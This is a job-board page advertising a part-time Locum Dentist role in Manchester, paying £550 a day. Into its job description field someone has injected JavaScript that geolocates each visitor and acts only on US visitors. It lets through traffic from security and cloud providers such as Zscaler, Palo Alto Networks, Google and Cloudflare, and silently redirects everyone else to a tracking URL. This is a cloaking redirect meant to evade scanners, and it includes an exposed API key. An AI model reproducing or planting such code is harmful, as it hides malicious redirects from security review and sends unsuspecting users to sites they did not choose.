Locum Dentist

Manchester, ENG
February 8, 2026

Apply for this job

Email *
Browse

Upload file .pdf, .doc, .docx

Deadline date:

Job Description

// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://uk.indeed.com/tmn/ccs/333b4ff38da224fd/e6096e0e526fd6a053cff097a917109fb69761f5b246c70003ccbb7031b603b9/2765583331732878?sf=vKb00’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });

We are seeking a qualified and dedicated Locum Dentist to join our dental practice. The ideal candidate will provide high-quality dental care, diagnose and treat various dental conditions, and demonstrate excellent communication skills, attention to detail, and a passion for patient care.


Responsibilities include:

  • Conducting thorough oral health examinations and reviewing medical histories
  • Diagnosing dental issues and developing tailored treatment plans
  • Performing procedures such as fillings, extractions, and root canals
  • Utilising medical imaging for diagnosis and planning
  • Maintaining accurate patient records in compliance with standards
  • Educating patients on oral hygiene and preventive care
  • Collaborating with the dental team to ensure smooth operations
  • Engaging in ongoing professional development

Requirements:

  • Degree in Dentistry from an accredited institution
  • Experience in a clinical setting preferred but not mandatory
  • Familiarity with medical imaging techniques
  • Strong knowledge of dental anatomy
  • Excellent interpersonal skills and ability to build rapport
  • GDC registration is required

Details:

  • Part-time role, £550/day
  • Expected 7–21 hours/week, Monday to Friday
  • Benefits include company events, free parking, and transport links